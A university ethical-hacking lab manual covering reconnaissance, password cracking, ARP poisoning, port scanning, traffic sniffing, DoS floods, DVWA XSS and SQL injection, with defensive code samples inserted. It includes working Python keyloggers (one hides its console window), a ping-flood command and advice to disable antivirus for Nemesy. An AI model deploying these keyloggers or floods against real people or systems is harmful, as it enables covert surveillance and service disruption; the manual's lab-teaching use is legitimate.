
Practical Manual of Ethical Hacking TYBSC CS


Rizvi College of Arts, Science and Commerce, Bandra

TYB.SC CS 6th Sem, Ethical Hacking, Dr. Ruchi Gupta

B.SC (CS) THIRD YEAR


Course: USCSP604 (Credits: 01 Lectures/Week: 03)
Practical of Skill Enhancement
USC 607: Ethical Hacking
1. Use Google and Whois for Reconnaissance
2. A) Use CrypTool to encrypt and decrypt passwords using RC4 algorithm
   B) Use Cain and Abel for cracking Windows account password using Dictionary attack and to decode wireless network passwords
3. A) Run and analyze the output of following commands in Linux – ifconfig, ping, netstat, traceroute
   B) Perform ARP Poisoning in Windows
4. Use NMap scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL, and XMAS
5. A) Use Wireshark (Sniffer) to capture network traffic and analyze
   B) Use Nemesy to launch DoS attack
6. Simulate persistent cross-site scripting attack
7. Session impersonation using Firefox and Tamper Data add-on.
8. Perform SQL injection attack
9. Create a simple keylogger using python
10. Using Metasploit to exploit (Kali Linux)



PRACTICAL NO.1

AIM: Use Google and Whois for Reconnaissance.


Using who.is

Step 1: Open the WHO.is website.

Step 2: Enter the website name and hit the Enter button.

Step 3: The site shows you information about www.google.co.in.
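A WHOIS lookup is a plain TCP/43 query (RFC 3912) whose reply is free text. The parser below, an added example that is not part of the manual, pulls out the registrar, name servers and expiry date from a constructed sample reply so it runs offline; whois_query() performs the real lookup and the server name it defaults to is an assumption.

```python
"""Parse a WHOIS reply into the fields that matter for reconnaissance.

Added example (not part of the manual). SAMPLE_REPLY is a CONSTRUCTED
reply in the usual "Key: Value" layout; whois_query() does the real
TCP/43 lookup (default server is an assumption, not from the manual).
"""
import socket
from datetime import datetime, timezone

# Constructed sample reply (not a real registration record).
SAMPLE_REPLY = """\
% Comment lines and blank lines are ignored by the parser
Domain Name: EXAMPLE.COM
Registrar: Example Registrar, Inc.
Creation Date: 2010-03-15T00:00:00Z
Registry Expiry Date: 2025-03-15T00:00:00Z
Name Server: NS1.EXAMPLE.NET
Name Server: NS2.EXAMPLE.NET
Domain Status: clientTransferProhibited
>>> Last update of WHOIS database: 2024-01-01T00:00:00Z <<<
"""


def whois_query(domain, server="whois.verisign-grs.com", timeout=10):
    """RFC 3912 query: send '<domain>\\r\\n' on TCP/43 and read until EOF."""
    with socket.create_connection((server, 43), timeout=timeout) as s:
        s.sendall(domain.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def parse_whois(text):
    """Collect 'Key: Value' lines; repeated keys (e.g. Name Server) become lists."""
    record = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("%", "#", ">>>")) or ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if value:
            record.setdefault(key, []).append(value)
    return record


def _parse_ts(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def days_until_expiry(record, now_iso=None):
    """Days left before the registration lapses (negative once it has expired)."""
    expiry = _parse_ts(record["registry expiry date"][0])
    now = _parse_ts(now_iso) if now_iso else datetime.now(timezone.utc)
    return (expiry - now).days


if __name__ == "__main__":
    rec = parse_whois(SAMPLE_REPLY)
    print("registrar:", rec["registrar"][0])
    print("name servers:", rec["name server"])
    print("days to expiry:", days_until_expiry(rec))
```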

PRACTICAL NO. 2

2.1) Use CrypTool to encrypt and decrypt passwords using RC4 algorithm.
Step 1:

Step 2:
● Click Encrypt/Decrypt Tab
● Select Symmetric (Modern)
● Using RC4.

Step 3: Encryption using RC4



Step 4: Decryption using RC4
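What CrypTool does in steps 3 and 4, as an added example that is not part of the manual or CrypTool: the RC4 key schedule (KSA) and keystream generator (PRGA), with encryption and decryption being the same XOR. The check values are the published RC4 test vectors.

```python
"""RC4 as CrypTool runs it: key scheduling (KSA) + keystream generation (PRGA).

Added example, not from the manual or CrypTool. Decryption is the same XOR
with the same keystream, which is why step 4 simply repeats step 3 with the
same key. Test vectors: key "Key" / plaintext "Plaintext" -> bbf316e8d940af0ad3.
"""


def rc4_keystream(key: bytes):
    """Generator yielding keystream bytes for the given key (1..256 bytes)."""
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 key must be 1..256 bytes")
    # KSA: permute S according to the key
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # PRGA: walk the permutation to produce keystream bytes
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt: XOR data with the keystream (the operation is symmetric)."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def keystream_reuse_leak(key: bytes, m1: bytes, m2: bytes) -> bool:
    """Stream-cipher caveat: two messages under one key leak m1 XOR m2."""
    c1, c2 = rc4(key, m1), rc4(key, m2)
    xor_ct = bytes(a ^ b for a, b in zip(c1, c2))
    xor_pt = bytes(a ^ b for a, b in zip(m1, m2))
    return xor_ct == xor_pt


if __name__ == "__main__":
    ct = rc4(b"Key", b"Plaintext")
    print(ct.hex())                 # bbf316e8d940af0ad3
    print(rc4(b"Key", ct))          # b'Plaintext'
    print(keystream_reuse_leak(b"Key", b"attack", b"retain"))   # True
```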



2.2) Use Cain and Abel for cracking Windows account password using Dictionary attack and to
decode wireless network passwords

Step 1:- Click on HASH Calculator

Step 2:- Enter the password to convert into a hash, then paste the resulting value (e.g. MD5) into the hash field.

Step 3:- Right Click on the hash and select the dictionary attack

Step 4:- Then right click on the file and select (Add to List) and then select the Wordlist

Step 5:- Select all the options and start the dictionary attack
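Why steps 3 to 5 succeed so quickly, as an added example that is not part of the manual: an unsalted MD5 hash costs one hash call per guess, so a wordlist is tried in milliseconds. The wordlist and target hash are constructed here; the second function runs the same wordlist against a salted, iterated PBKDF2 hash so the cost difference a defender relies on is visible.

```python
"""Dictionary attack against an unsalted MD5 hash versus a salted, slow hash.

Added example, not from the manual or Cain & Abel. WORDLIST stands in for
the file chosen in step 4 and is CONSTRUCTED; the target hash is computed
inline from "password123" (step 2).
"""
import hashlib
import os
import time

# Constructed wordlist (a real one has millions of entries).
WORDLIST = ["123456", "letmein", "qwerty", "password", "password123", "welcome1"]


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode()).hexdigest()


def dictionary_attack_md5(target_hex: str, wordlist):
    """Return (word, guesses) for the first MD5 match, or (None, total guesses)."""
    for n, word in enumerate(wordlist, 1):
        if md5_hex(word) == target_hex:
            return word, n
    return None, len(wordlist)


def pbkdf2_hex(word: str, salt: bytes, iterations: int = 200_000) -> str:
    """Salted, iterated hash: per-user salt defeats precomputed tables."""
    return hashlib.pbkdf2_hmac("sha256", word.encode(), salt, iterations).hex()


def dictionary_attack_pbkdf2(target_hex: str, salt: bytes, wordlist, iterations=200_000):
    """Same attack, but every guess now costs `iterations` HMAC computations."""
    for n, word in enumerate(wordlist, 1):
        if pbkdf2_hex(word, salt, iterations) == target_hex:
            return word, n
    return None, len(wordlist)


if __name__ == "__main__":
    target = md5_hex("password123")        # what the hash calculator produced
    t0 = time.perf_counter()
    print(dictionary_attack_md5(target, WORDLIST), f"{time.perf_counter() - t0:.5f}s")
    salt = os.urandom(16)
    target2 = pbkdf2_hex("password123", salt)
    t0 = time.perf_counter()
    print(dictionary_attack_pbkdf2(target2, salt, WORDLIST), f"{time.perf_counter() - t0:.2f}s")
```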

PRACTICAL NO. 3
3.1) Using Traceroute, ping, ifconfig, netstat Command

Step 1: Type tracert www.google.com and press Enter.


Tracert:-
The tracert command is a Command Prompt command that's used to show several details about the
path that a packet takes from the computer or device you're on to whatever destination you specify.
Syntax
tracert [-d] [-h MaxHops] [-w TimeOut] [-4] [-6] target [/?]
Traceroute
Traceroute is a command which can show you the path a packet of information takes from your
computer to one you specify. It will list all the routers it passes through until it reaches its destination,
or fails to and is discarded. In addition to this, it will tell you how long each 'hop' from router to router
takes.

Step 2: Ping all the IP addresses


Ping:-
The ping command is a Command Prompt command used to test the ability of the source computer to
reach a specified destination computer. The ping command is usually used as a simple way to verify
that a computer can communicate over the network with another computer or network device.
Syntax
ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [-w timeout] [-R]
[-S srcaddr] [-p] [-4] [-6] target [/?]

Step 3:- run ipconfig/ifconfig


Ipconfig/Ifconfig
Ipconfig is a DOS utility that can be used from MS-DOS and the Windows command line to display the
network settings currently assigned and given by a network. This command can be utilized to verify a
network connection as well as to verify your network settings.
Syntax
ipconfig [/allcompartments] [/? | /all | /renew [adapter] | /release [adapter] | /renew6 [adapter] |
/release6 [adapter] | /flushdns | /displaydns | /registerdns | /showclassid adapter | /setclassid adapter
[classid] | /showclassid6 adapter | /setclassid6 adapter [classid] ]

Step 4:- run Netstat


The netstat command, meaning network statistics, is a Command Prompt command used to
display very detailed information about how your computer is communicating with other computers or
network devices. Specifically, the netstat command can show details about individual network
connections, overall and protocol-specific networking statistics, and much more, all of which could
help troubleshoot certain kinds of networking issues.
Syntax
netstat [-a] [-b] [-e] [-f] [-n] [-o] [-p protocol] [-r] [-s] [-t] [-x] [-y] [time_interval] [/?]

Step5:- run ARP command


The arp command is used to view and modify the ARP table entries on the local computer. This
may display all the known connections on your local area network segment (if they have
been active and in the cache). The arp command is useful for viewing the ARP cache
and resolving address resolution problems.

Syntax (InetAddr means Internet address)

arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]]
[-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]

On Linux

3.2) Perform ARP Poisoning in Windows

Step 1: Download and install Cain & Abel software in VMware.
Step 2: Go to Sniffer and then click on Configuration, select the appropriate wireless adapter. Click on Apply and then click on the OK button.
Step 3: Activate the sniffer.
Step 4: Click on the + icon. Check the "All Tests" checkbox and then click OK.

Step 5: Click on APR, then click on the blank screen and then click on the + icon. Select any IP
address (IPv4 address).

Step 6: select all the IP address and MAC address and then click on OK

Step 7: Apply ARP.

Step 8: Go to any website on source ip address.



Step 9: Go to the Passwords option in Cain & Abel and see the password for the visited site.
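How the poisoning of steps 5 to 8 shows up on the victim, as an added example that is not part of the manual: after APR is applied, the attacker's MAC sits against the gateway IP in the victim's ARP cache, so one MAC is claimed by two IPs and the gateway's MAC no longer matches the one recorded on a clean network. The parser reads arp -a output in both the Windows and Linux layouts; all addresses below are constructed.

```python
"""Detect ARP-cache poisoning from `arp -a` output (Windows and Linux layouts).

Added example, not from the manual. The samples and the baseline gateway
MAC are CONSTRUCTED values.
"""
import re
from collections import defaultdict

WINDOWS_ARP = """\
Interface: 192.168.43.50 --- 0xb
  Internet Address      Physical Address      Type
  192.168.43.1          aa-bb-cc-00-00-99     dynamic
  192.168.43.159        aa-bb-cc-00-00-99     dynamic
  192.168.43.255        ff-ff-ff-ff-ff-ff     static
"""

LINUX_ARP = """\
_gateway (192.168.43.1) at aa:bb:cc:00:00:01 [ether] on eth0
? (192.168.43.159) at aa:bb:cc:00:00:99 [ether] on eth0
"""

# Gateway MAC recorded on a clean network (constructed baseline).
KNOWN_GATEWAY = ("192.168.43.1", "aa:bb:cc:00:00:01")

_ENTRY = re.compile(
    r"(?:\(|\s)(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?\s+(?:at\s+)?"
    r"(?P<mac>[0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})"
)


def parse_arp_table(text):
    """Return {ip: mac} with MACs normalised to lower-case colon form."""
    table = {}
    for line in text.splitlines():
        m = _ENTRY.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower().replace("-", ":")
    return table


def find_arp_anomalies(table, known_gateway=KNOWN_GATEWAY):
    """Flag one MAC claimed by several IPs, and a gateway whose MAC changed."""
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        if mac != "ff:ff:ff:ff:ff:ff":      # the broadcast entry legitimately repeats
            by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} claimed by {sorted(ips)}")
    gw_ip, gw_mac = known_gateway
    if gw_ip in table and table[gw_ip] != gw_mac:
        findings.append(f"gateway {gw_ip} MAC changed {gw_mac} -> {table[gw_ip]}")
    return findings


if __name__ == "__main__":
    for name, text in (("windows", WINDOWS_ARP), ("linux", LINUX_ARP)):
        print(name, find_arp_anomalies(parse_arp_table(text)))
```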

PRACTICAL NO. 4

AIM: Using Nmap scanner to perform port scanning of various forms – ACK, SYN, FIN,
NULL, and XMAS.

NOTE: Download Nmap for Windows and install it. After that open cmd and type "nmap" to check if it
is installed properly. Now type the below commands.
nmap <ip address>

● ACK -sA (TCP ACK scan)


It never determines open (or even open|filtered) ports. It is used to map out firewall rulesets,
determining whether they are stateful or not and which ports are filtered.

Command: nmap -sA -T4 scanme.nmap.org

● SYN (Stealth) Scan (-sS)


SYN scan is the default and most popular scan option for good reason. It can be performed
quickly, scanning thousands of ports per second on a fast network not hampered by intrusive
firewalls.

Command: nmap -p22,113,139 scanme.nmap.org



● FIN Scan (-sF)


Sets just the TCP FIN bit.

Command: nmap -sF -T4 para

● NULL Scan (-sN)


Does not set any bits (TCP flag header is 0)

Command: nmap -sN -p 22 scanme.nmap.org

● XMAS Scan (-sX)


Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.

Command: nmap -sX -T4 scanme.nmap.org
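How Nmap turns a reply into a port state for each of the five scan types above, as an added example that is not part of the manual or of Nmap: it builds the TCP flag byte each probe carries and applies the interpretation rules from the Nmap reference guide. No packets are sent; the replies are constructed inputs.

```python
"""Probe flags and reply interpretation for -sS, -sA, -sF, -sN and -sX.

Added example, not from the manual or Nmap. Rules follow the Nmap reference
guide: SYN/ACK = open (SYN scan), RST = closed (SYN/FIN/NULL/Xmas) or
unfiltered (ACK scan), no reply = filtered (SYN/ACK) or open|filtered
(FIN/NULL/Xmas), ICMP unreachable codes 1,2,3,9,10,13 = filtered.
"""
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Flags set on the probe packet for each scan type
PROBE_FLAGS = {
    "-sS": SYN,
    "-sA": ACK,
    "-sF": FIN,
    "-sN": 0,                  # NULL scan: no flag bits at all
    "-sX": FIN | PSH | URG,    # "Christmas tree" packet
}

# ICMP type 3 codes Nmap treats as "filtered" (destination unreachable)
FILTERED_ICMP_CODES = {1, 2, 3, 9, 10, 13}


def flag_names(bits):
    names = [n for n, b in (("FIN", FIN), ("SYN", SYN), ("RST", RST),
                            ("PSH", PSH), ("ACK", ACK), ("URG", URG)) if bits & b]
    return "+".join(names) or "none"


def port_state(scan, reply):
    """reply: None (no answer), ("tcp", flags) or ("icmp", type, code)."""
    if reply is not None and reply[0] == "icmp":
        return "filtered" if reply[1] == 3 and reply[2] in FILTERED_ICMP_CODES else "unknown"
    tcp = reply[1] if reply else None
    if scan == "-sS":
        if tcp is None:
            return "filtered"
        if tcp & SYN and tcp & ACK:
            return "open"
        return "closed" if tcp & RST else "unknown"
    if scan == "-sA":                          # maps firewall rules, never "open"
        if tcp is None:
            return "filtered"
        return "unfiltered" if tcp & RST else "unknown"
    if scan in ("-sF", "-sN", "-sX"):          # RFC 793: closed ports answer RST
        if tcp is None:
            return "open|filtered"
        return "closed" if tcp & RST else "unknown"
    raise ValueError(f"unsupported scan type {scan}")


if __name__ == "__main__":
    for scan, bits in PROBE_FLAGS.items():
        print(f"{scan}: probe flags = {flag_names(bits)}")
    print(port_state("-sS", ("tcp", SYN | ACK)))   # open
    print(port_state("-sX", None))                  # open|filtered
    print(port_state("-sA", ("tcp", RST)))          # unfiltered
```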



PRACTICAL NO. 5
5.1) Use Wireshark sniffer to capture network traffic and analyze.
Step 1: Install and open WireShark.

Step 2: Go to Capture tab and select option.



Step 3: In input, Select Connection and click on start.


Step 4: The source, Destination and protocols of the packets in the LAN network are displayed.

Step 5: Open a website in a new window and enter the user id and password. Register if needed.

Step 6: Enter the credentials and then sign in.



Step 7: The WireShark tool will keep recording the packets.

Step 8: Select filter as http to make the search easier and click on apply.

Step 9: Now stop the tool to stop recording.



Step 10: Find the post methods for username and passwords.

Step 11: You will see the email id and password that you used to log in.
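What steps 10 and 11 reveal, as an added example that is not part of the manual: the login form travels as a plain-text HTTP POST body, so anyone on the path can read the password field. The bytes below are a constructed TCP payload of the kind the http filter shows; the parser splits headers from body and decodes the form fields, which is the reason a login page must be served over HTTPS.

```python
"""Recover form credentials from a captured plain-HTTP POST payload.

Added example, not from the manual or Wireshark. CAPTURED_PAYLOAD is a
CONSTRUCTED request (host, path and credentials are made up).
"""
from urllib.parse import parse_qs

CAPTURED_PAYLOAD = (
    b"POST /login.php HTTP/1.1\r\n"
    b"Host: testsite.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 47\r\n"
    b"\r\n"
    b"email=student%40example.com&password=P%40ss1234"
)

SENSITIVE_FIELDS = ("password", "passwd", "pass", "pwd")


def parse_http_request(payload: bytes):
    """Return (method, path, headers, body) from a raw HTTP/1.x request."""
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", len(body)))
    return method, path, headers, body[:length]


def extract_form_credentials(payload: bytes):
    """Return the form fields a sniffer can read, or None if not a form POST."""
    method, path, headers, body = parse_http_request(payload)
    if method != "POST" or not headers.get("content-type", "").startswith(
            "application/x-www-form-urlencoded"):
        return None
    fields = {k: v[0] for k, v in parse_qs(body.decode()).items()}
    exposed = {k: v for k, v in fields.items() if k.lower() in SENSITIVE_FIELDS}
    return {"path": path, "fields": fields, "exposed_secrets": exposed}


if __name__ == "__main__":
    print(extract_form_credentials(CAPTURED_PAYLOAD))
```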

5.2) Use Nemesy to launch DoS attack


● Ping of Death
We will assume you are using Windows for this exercise. We will also assume that you have at least
two computers that are on the same network. DoS attacks are illegal on networks that you are not
authorized to test, which is why you will need to set up your own network for this exercise.
● Open the command prompt on the target computer
● Enter the command ipconfig. You will get results similar to the ones shown below

For this example, we are using Mobile Broadband connection details. Take note of the IP address.
Note: for this example to be more effective, you must use a LAN network.
● Switch to the computer that you want to use for the attack and open the command prompt.
● We will ping our victim computer with an endless stream of 65500-byte data packets.
● Enter the following command
ping 10.128.131.108 -t -l 65500
HERE,
● “ping” sends the data packets to the victim
● “10.128.131.108” is the IP address of the victim
● “-t” means the data packets should be sent until the program is stopped
● “-l” specifies the data load to be sent to the victim
You will get results similar to the ones shown below

Flooding the target computer with data packets doesn’t have much effect on the victim. In order for the
attack to be more effective, you should attack the target computer with pings from more than one
computer.

The above attack can be used to attack routers, web servers etc.
If you want to see the effects of the attack on the target computer, you can open the task manager and
view the network activities.

● Right click on the taskbar


● Select start task manager
● Click on the network tab
● You will get results similar to the following

If the attack is successful, you should be able to see increased network activities.
● Hacking Activity: Launch a DOS attack
In this practical scenario, we are going to use Nemesy to generate data packets and flood the target
computer, router or server. As stated above, Nemesy will be detected as an illegal program by your
anti-virus. You will have to disable the anti-virus for this exercise.

● Download Nemesy from http://packetstormsecurity.com/files/25599/nemesy13.zip.html


● Unzip it and run the program Nemesy.exe
● You will get the following interface

Enter the target IP address, in this example; we have used the target IP we used in the above example.
HERE,

● 0 as the number of packets means infinity. You can set it to the desired number if you do not
want to send an infinite number of data packets.
● The size field specifies the data bytes to be sent and the delay specifies the time interval in
milliseconds.

Click on send button


You should be able to see the following results

The title bar will show you the number of packets sent
Click on halt button to stop the program from sending data packets.
You can monitor the task manager of the target computer to see the network activities.
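Seeing the ping or Nemesy flood from the target's side, as an added example that is not part of the manual: the task manager graph only shows aggregate load, whereas a packet capture identifies the source. The detector reads constructed packet summary lines (number, time, source, destination, protocol, length, the layout Wireshark exports) and flags any source that exceeds a packets-per-second or bytes-per-second budget within a sliding one-second window.

```python
"""Rate-based flood detection over packet summary lines.

Added example, not from the manual. CAPTURE is CONSTRUCTED: 10.128.131.200
sends six 65500-byte ICMP packets within 0.3 s while 10.128.131.5 is
ordinary web traffic.
"""
from collections import defaultdict, deque

CAPTURE = """\
1 0.000 10.128.131.5 10.128.131.108 TCP 74
2 0.050 10.128.131.200 10.128.131.108 ICMP 65500
3 0.100 10.128.131.200 10.128.131.108 ICMP 65500
4 0.150 10.128.131.200 10.128.131.108 ICMP 65500
5 0.200 10.128.131.200 10.128.131.108 ICMP 65500
6 0.250 10.128.131.200 10.128.131.108 ICMP 65500
7 0.300 10.128.131.200 10.128.131.108 ICMP 65500
8 2.500 10.128.131.5 10.128.131.108 TCP 1514
"""


def parse_capture(text):
    """Yield (time, src, dst, proto, length) tuples from summary lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue                     # skip headers or malformed lines
        _no, t, src, dst, proto, length = parts
        yield float(t), src, dst, proto, int(length)


def detect_floods(packets, window=1.0, max_pps=5, max_bps=200_000, proto="ICMP"):
    """Return {src: (time, pps, bps)} for the first moment a source exceeds a limit."""
    recent = defaultdict(deque)          # src -> (time, length) pairs inside the window
    alerts = {}
    for t, src, _dst, p, length in packets:
        if p != proto:
            continue
        q = recent[src]
        q.append((t, length))
        while q and t - q[0][0] > window:
            q.popleft()
        pps = len(q) / window
        bps = sum(n for _, n in q) / window
        if src not in alerts and (pps > max_pps or bps > max_bps):
            alerts[src] = (t, pps, bps)
    return alerts


if __name__ == "__main__":
    for src, (t, pps, bps) in detect_floods(parse_capture(CAPTURE)).items():
        print(f"{t:.3f}s flood from {src}: {pps:.0f} pkt/s, {bps:.0f} B/s")
```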

PRACTICAL No. 6
AIM: Simulate persistent cross-site scripting attack
Step 1: Open XAMPP and start apache and mysql

Step 2: Go to localhost:8080/setup.php and log in using username: admin; password: password.

Step 3: The home page opens.

Step 4: Once logged in we want to navigate to the DVWA Security tab, select “Low” in the
drop-down box, and hit Submit.

Step 5: Stored Cross Site Scripting



Step 6: Reflected Cross Site Scripting

OUTPUT

Step 7: DOM Cross Site Scripting (Persistent XSS)


OUTPUT
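The guestbook behind the stored (persistent) XSS step, as an added example that is not part of the manual or of DVWA's source: a message is stored once and rendered to every later visitor, which is what makes stored XSS worse than the reflected case. render_vulnerable() interpolates the text raw, as at the "Low" level; render_safe() HTML-escapes on output and the CSP header is the second layer to serve alongside it. The payload is the standard harmless alert(1) test string.

```python
"""Stored XSS: vulnerable rendering beside output escaping and a CSP header.

Added example, not from the manual or DVWA. The guestbook is an in-memory
list standing in for DVWA's table; PAYLOAD is the usual harmless test input.
"""
import html

guestbook = []          # persisted messages; a database table in DVWA

PAYLOAD = "<script>alert(1)</script>"
CSP_HEADER = ("Content-Security-Policy", "default-src 'self'; script-src 'self'")


def post_message(name, message):
    """Store the visitor's message exactly as submitted (no input filtering)."""
    guestbook.append({"name": name, "message": message})


def render_vulnerable():
    """Low security: user text is dropped straight into the HTML."""
    rows = "".join(f"<div>{m['name']}: {m['message']}</div>" for m in guestbook)
    return f"<html><body>{rows}</body></html>"


def render_safe():
    """Escape on output: <, >, &, quotes become entities, so browsers show text."""
    rows = "".join(
        f"<div>{html.escape(m['name'])}: {html.escape(m['message'])}</div>"
        for m in guestbook)
    return f"<html><body>{rows}</body></html>"


def contains_active_script(page: str) -> bool:
    """Crude check: does an unescaped <script> tag survive into the page?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    post_message("alice", "hello")
    post_message("mallory", PAYLOAD)
    print("vulnerable page executes payload:", contains_active_script(render_vulnerable()))
    print("escaped page executes payload:   ", contains_active_script(render_safe()))
    print("serve every page with:", CSP_HEADER)
```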

PRACTICAL NO. 8
AIM: Perform SQL injection attack.

Step 1: Open XAMPP and start apache and mysql, then go to the web browser and enter the site
http://localhost/phpmyadmin/

Step 2: Create database with name DVWA.


Step 4: Go to site localhost:8080/setup.php after login and click on setup/reset database.

Connect with database


Step 5: Click on the SQL Injection option on the left. Write "1' or '='" in the text box and click submit.
Step 6: Write "1" in text box and click on submit.

Step 7: Write "1=1" in text box and click on submit.

Step 8: Write "1*" in text box and click on submit.
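The query behind the form in steps 5 to 8, as an added example that is not part of the manual or of DVWA's source: an in-memory SQLite table stands in for the users table, and the query shape is assumed to be SELECT first_name, last_name FROM users WHERE user_id = '<id>'. The classic injection input 1' or '1'='1 and the plain inputs from steps 6 to 8 are replayed against the string-built query and against a parameterised one.

```python
"""SQL injection: string-built query beside the parameterised fix.

Added example, not from the manual or DVWA. The table rows are CONSTRUCTED
and the query shape is an assumption about the exercise's form.
"""
import sqlite3

INPUTS = ["1", "1' or '1'='1", "1=1", "1*"]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "admin"), (2, "Gordon", "Brown"),
                    (3, "Hack", "Me"), (4, "Pablo", "Picasso"), (5, "Bob", "Smith")])
    return db


def lookup_vulnerable(db, user_id):
    """String-built query ('Low' level): a quote in the input rewrites the SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return db.execute(sql).fetchall()


def lookup_safe(db, user_id):
    """Parameterised query: the input is bound as data and cannot alter the SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for value in INPUTS:
        print(f"{value!r:16} vulnerable -> {len(lookup_vulnerable(db, value))} rows, "
              f"safe -> {len(lookup_safe(db, value))} rows")
```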


PRACTICAL NO. 9

AIM : Create a simple keylogger using python


from pynput.keyboard import Key, Listener
import logging

# Directory for the log file; an empty string means the current directory
log_dir = ""
# Basic logging setup: every key press is appended with a timestamp
logging.basicConfig(filename=(log_dir + "key_log.txt"), level=logging.DEBUG,
                    format='%(asctime)s:%(message)s:')


# Callback invoked by the listener for every key press
def on_press(key):
    logging.info(str(key))


# Start the listener and block until it stops
with Listener(on_press=on_press) as listener:
    listener.join()

Keylogger for Windows


Download some python libraries:
1) pywin32
2) pyhook
In CMD: pip install pywin32
If it does not work, copy pywintypes26.dll and pythoncom26.dll
from C:\Python26\Lib\site-packages\pywin32_system32 to C:\Python26\Lib\site-packages\win32

Steps to download pyHook:

1) Visit https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyhook and download the version with
"36" in the name.
2) Open cmd.
   On cmd, change directory into the location where pip and the whl file are stored, then type
   pip install (whl name with 36 in the version name)
3) On cmd type: pip install pyHook-1.5.1-cp36-cp36m-win32.whl

Following is the code to create keylogger in python


# Python code for keylogger to be used in windows
import win32api
import win32console
import win32gui
import pythoncom, pyHook
from os import _exit

# Hide the console window so the script keeps running in the background
win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win, 0)


def OnKeyboardEvent(event):
    # Ctrl+E (ASCII 5) stops the keylogger
    if event.Ascii == 5:
        _exit(1)
    # Skip NUL (0) and backspace (8); the original "!= 0 or 8" test was always true
    if event.Ascii != 0 and event.Ascii != 8:
        keylogs = chr(event.Ascii)
        if event.Ascii == 13:      # Enter key: record a newline
            keylogs = '\n'
        # append the new keystroke to output.txt (creates the file if missing)
        f = open(r'c:\output.txt', 'a')
        f.write(keylogs)
        f.close()
    # pass the event on to other hooks and applications
    return True


# create a hook manager object
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()
Save the file in C:\ as Keylogger.py and run the python file
Output:
The keylogger will be started in the background and save all the data on the log file “c:\output.txt”.

Keylogger in Linux
pyxhook requires python-xlib. Install it if you don’t have it already.
In Terminal Type:-
$sudo apt-get update
$sudo apt-get install python-xlib
$sudo apt install python-pip
$pip install pyxhook

# Python code for keylogger to be used in linux


import os
import pyxhook

# Log file path: override with the pylogger_file environment variable
log_file = os.environ.get('pylogger_file', os.path.expanduser('~/Desktop/file.log'))
# Allow setting the cancel key from environment args, Default: `
cancel_key = ord(os.environ.get('pylogger_cancel', '`')[0])
# Allow clearing the log file on start, if pylogger_clean is defined.
if os.environ.get('pylogger_clean', None) is not None:
    try:
        os.remove(log_file)
    except EnvironmentError:
        # File does not exist, or no permissions.
        pass


# creating key pressing event and saving it into log file
def OnKeyPress(event):
    with open(log_file, 'a') as f:
        f.write('{}\n'.format(event.Key))
    # stop the hook when the cancel key is pressed
    if event.Ascii == cancel_key:
        new_hook.cancel()


# create a hook manager object
new_hook = pyxhook.HookManager()
new_hook.KeyDown = OnKeyPress
# set the hook
new_hook.HookKeyboard()
try:
    new_hook.start()  # start the hook
except KeyboardInterrupt:
    # User cancelled from command line.
    pass
except Exception as ex:
    # Write exceptions to the log file, for analysis later.
    msg = 'Error while catching events:\n {}'.format(ex)
    pyxhook.print_err(msg)
    with open(log_file, 'a') as f:
        f.write('\n{}'.format(msg))

Output:
The keylogger will be started in the background and save all the data on the file.log file in
“/home/akash/Desktop”.

PRACTICAL NO. 10
AIM: Using Metasploit to exploit
Step 1:

● We will download Virtual box and install it.


● Download and install Kali distribution.
● Download and install Metasploitable which will be our hacking machine.
● Download and install Windows XP which will be another hacking machine.
Step 2:

● First of all, open the Metasploit console in Kali.


● You can do so by following the path: Applications → Exploitation Tools → Metasploit.

● Once you open the Metasploit console, you will get to see the following screen. Highlighted in red
underline is the version of Metasploit.
Step 3: Use the following commands to install metasploit-framework. After running them, you will
have to wait several minutes until the update completes.
apt install metasploit-framework
apt update
Step 4: First we create the payload using the command line in Kali Linux
